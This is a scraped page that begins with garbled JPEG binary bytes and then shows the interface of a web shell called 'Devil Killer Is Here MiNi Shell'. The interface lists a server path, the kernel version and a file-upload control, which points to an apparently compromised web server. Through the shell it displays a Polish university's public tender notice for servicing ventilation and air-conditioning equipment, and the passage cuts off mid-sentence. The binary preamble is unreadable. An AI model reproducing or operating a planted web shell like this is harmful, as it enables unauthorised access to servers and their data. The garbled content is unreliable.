JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240605/0035306201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie przeglądów serwisowych, konserwacji i napraw agregatów chłodniczych, central wentylacyjnych, nawilżaczy, klimatyzatorów, wentylatorów w budynkach Politechniki Gdańskiej. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Gdańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Centrum Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Narutowicza 11/12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@pg.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pg.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie przeglądów serwisowych, konserwacji i napraw agregatów chłodniczych, central wentylacyjnych, nawilżaczy, klimatyzatorów, wentylatorów w budynkach Politechniki Gdańskiej. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ccd9b41c-232b-11ef-a500-1a0072d5d2bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00353062</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00036123/13/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa konserwacji klimatyzacji i wentylacji</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pg_edu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pg_edu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy zakupowej<br/>https://platformazakupowa.pl/pn/pg_edu oraz poczty elektronicznej.<br/>2. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia lub znakiem postępowania.<br/>3. Zamawiający wyznaczył następujące osoby do kontaktu z Wykonawcami: Ewa Krasińska-Wera, email: ewera@pg.edu.pl. Zaleca<br/>się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość”, nie za<br/>pośrednictwem adresu email.<br/>5. W celu skrócenia czasu udzielenia odpowiedzi na pytania Zamawiający preferuje, aby komunikacja między zamawiającym a<br/>wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za<br/>pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków,<br/>zawiadomień oraz informacji Zamawiający uzna datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij<br/>wiadomość” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>6. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania<br/>i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem<br/>Platformy do konkretnego wykonawcy.<br/>7. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer<br/>klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer<br/>minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący<br/>format plików .pdf, f) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,g) Oznaczenie czasu<br/>odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępują do niniejszego postępowania o udzielenie zamówienia publicznego: a) musi zaakceptować warunki<br/>korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce<br/>„Regulamin&#34; oraz uznać go za wiążący, b) musi się zapoznać i stosować do Instrukcji składania ofert/wniosków dostępnej pod<br/>linkiem: https://platformazakupowa.pl/strona/45- instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE.<br/>L. z 2016 r. nr 119, str. 1; zm.: Dz. U. UE.L. z 2018 r. Nr 127, str. 2), dalej „RODO”, Zamawiający informuje, że: a) administratorem<br/>Pani/Pana danych osobowych jest Politechnika Gdańska z siedzibą w 80-233 Gdańsk przy ul. G. Narutowicza 11/12;b) inspektorem<br/>ochrony danych osobowych w Politechnice Gdańskiej jest mgr inż. Paweł Baniel, tel. +48 58 348-66-29, e-mail: iod@pg.edu.pl;c)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego nr ZP/102/055/U/24 pn. Wykonanie przeglądów serwisowych, konserwacji i<br/>napraw agregatów chłodniczych, central wentylacyjnych, nawilżaczy, klimatyzatorów, wentylatorów w budynkach Politechniki<br/>Gdańskiej prowadzonym zgodnie z art. 275 ust. 1 ustawy Pzp – bez negocjacji.; d) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, Którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych; e)<br/>Pani/Pana dane<br/>osobowe będą przechowywane przez okres co najmniej 4 lata od dnia zakończenia postępowania;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp; g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO; h) posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani<br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);− prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; i) nie przysługuje<br/>Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Dodatkowo, stosownie do art. 8a ust. 5 ustawy Pzp, Zamawiający informuje o<br/>ograniczeniach, o których mowa w art. 18 ust. 6 oraz art. 19 ust. 2 i 3 ustawy Pzp:1) Zamawiający udostępnia dane osobowe, o<br/>których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z P\ przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1, z<br/>późn. zm.), zwanego dalej &#34;rozporządzeniem 2016/679&#34;, w celu umożliwienia korzystania ze środków ochrony prawnej, o których<br/>mowa w dziale IX, do upływu terminu na ich wniesienie 2) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia<br/>do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z ustawą.3) W postępowaniu o udzielenie<br/>zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/102/055/U/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 1000216,76 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie przeglądów serwisowych, konserwacji i napraw urządzeń wentylacyjnych,<br/>klimatyzacyjnych oraz wentylacyjno-klimatyzacyjnych w budynkach Politechniki Gdańskiej, w ilościach:<br/>1) agregaty chłodnicze - 21<br/>2) centrale wentylacyjne (nawiewno-wywiewne, klimatyzacyjne) - 74<br/>3) centrale wentylacyjne (nawiewno-wywiewne) - 116<br/>4) central wentylacyjnych (nawiewne, klimatyzacyjne) - 9<br/>5) central wentylacyjnych (nawiewne) - 70<br/>6) centrale wentylacyjne (wywiewne) - 21<br/>7) nawilżacze - 9<br/>8) klimatyzacja kanałowa / klimatyzacja precyzyjna - 92<br/>9) klimatyzatory (przenośne, pompy ciepła, jednostki wewnętrzne oraz<br/>zewnętrzne Split, Multi, VRF) - 1029<br/>10) wentylatory (dachowe, kanałowe, promieniowe, osiowe) - 540<br/>2. Lokalizacja i rodzaj urządzeń znajduję się w załączniku nr 1 do Umowy.<br/>3. Planowana liczba przeglądów serwisowych, roboczogodzin na naprawy oraz koszt części zamiennych ma charakter<br/>szacunkowy i w związku z tym, Zamawiający ma prawo do niezrealizowania przedmiotu umowy w pełnym zakresie, tj.<br/>planowanych liczb i kosztów.<br/>4. Strony postanawiają, że na wniosek Zamawiającego możliwe jest zaprzestanie przeglądów, konserwacji i napraw<br/>Ogłoszenie nr 2024/BZP 00316842/01 z dnia 2024-05-09<br/>2024-05-09 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>urządzeń w poszczególnych obiektach. Zamawiający może równocześnie zgłosić do konserwacji dodatkowe urządzenia<br/>wentylacyjne, klimatyzacyjne oraz wentylacyjno-klimatyzacyjne.<br/>5. Zamawiający gwarantuje Wykonawcy realizację umowy o wartości nie mniejszej niż 70% wartości wskazanej w § 4 ust. 1<br/>punkt 1) umowy. Ilości wykonywanych przeglądów, oraz roboczogodzin i kosztów materiałów na naprawy są wartościami<br/>szacunkowymi i Zamawiającemu przysługuje prawo do niezrealizowania ich w całości, a Wykonawcy nie będzie wówczas<br/>przysługiwało żadne roszczenie z tego tytułu.<br/>6. Zamawiający nie wymaga osobistego wykonania przez wykonawcę kluczowych zadań.<br/>7. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.<br/>8. Zamawiający żąda wskazania przez wykonawcę, w ofercie, części zamówienia, których wykonanie zamierza powierzyć<br/>podwykonawcom, oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani.<br/>9. W celu utrzymania ciągłości gwarancji na zainstalowanych u zamawiającego urządzeniach Fujitsu, Zamawiający<br/>wymaga, aby prace przy tych urządzeniach wykonywane były przez Autoryzowanego Partnera Serwisowego (APS) Fujitsu.<br/>Przed zawarciem umowy Zamawiający będzie wymagał od Wykonawcy dokumentu potwierdzającego, że prace przy tych<br/>urządzenia będą wykonywane przez Autoryzowanego Partnera Serwisowego (APS) Fujitsu.<br/>11. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych we wzorze umowy<br/>stanowiącym załącznik nr 5 do SWZ.<br/>Stosownie do art. 60 i art. 121 Ustawy pzp, Zamawiający zastrzega obowiązek osobistego wykonania przez wykonawcę kluczowych zadań w zakresie wykonywania przeglądów serwisowych i konserwacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50700000-2 - Usługi w zakresie napraw i konserwacji instalacji budynkowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50711000-2 - Usługi w zakresie napraw i konserwacji elektrycznych instalacji budynkowych</p> <p class="mb-0">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W przypadku zaistnienia konieczności zwiększenia zakresu zamówienia (wykonania większej ilości przeglądów<br/>serwisowych, konserwacji i napraw), spowodowanej zwiększoną ilością awarii lub zgłoszeniem do serwisowania<br/>dodatkowych urządzeń wentylacyjnych, klimatyzacyjnych oraz wentylacyjno-klimatyzacyjnych, Zamawiający przewiduje<br/>możliwość skorzystania z prawa opcji na następujących warunkach:<br/>a) do 10 % zamówienia podstawowego za przeglądy serwisowe i konserwację w zakresie przeglądów i konserwacji,<br/>b) do 20% zamówienia podstawowego za naprawy wraz z częściami zamiennymi w zakresie napraw z częściami<br/>zamiennymi.<br/>c) zamówienia w ramach prawa opcji będą realizowane na takich samych warunkach, jak zamówienie podstawowe, w<br/>cenach zamówienia podstawowego, po wykorzystaniu kwot wynagrodzenia umownego przeznaczonych odpowiednio na<br/>realizację zamówienia podstawowego;<br/>d) zamówienie opcjonalne nie stanowi zobowiązania Zamawiającego do jego udzielenia, jak również nie stanowi podstawy<br/>do dochodzenia przez Wykonawcę roszczeń odszkodowawczych z tytułu niezrealizowania tego zamówienia. Oświadczenie<br/>woli Zamawiającego o realizacji bądź zaniechanie zamówienia opcjonalnego jest wyłącznym uprawnieniem Zamawiającego <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą ofertę zostanie uznana oferta spełniająca wymagania SWZ oraz ustawy Pzp,<br/>która uzyska największą łączną liczbę punktów (K= Kck + Kcn + Kczda + Kczjz).<br/>2. Kryteria oceny ofert obejmują:<br/>1) cena przeglądów serwisowych (Kck) - 30%, co odpowiada 30 pkt.<br/>2) cena napraw (Kcn) - 30%, co odpowiada 30 pkt.<br/>3) czas przystąpienia do diagnoz i usunięcia awarii (Kczda) - 20%, co odpowiada 20 pkt.<br/>4) czas dostarczenia jednostki zastępczej (Kczjz) - 20%, co odpowiada 20 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena napraw</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przystąpienia do diagnoz i usunięcia awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostarczenia jednostki zastępczej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zamawiający na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:<br/>1) uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada: „certyfikat przedsiębiorcy”, o którym mowa<br/>w art. 29 ustawy z dnia 15.05.2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych<br/>gazach cieplarnianych (Dz.U. z 2019 r. poz. 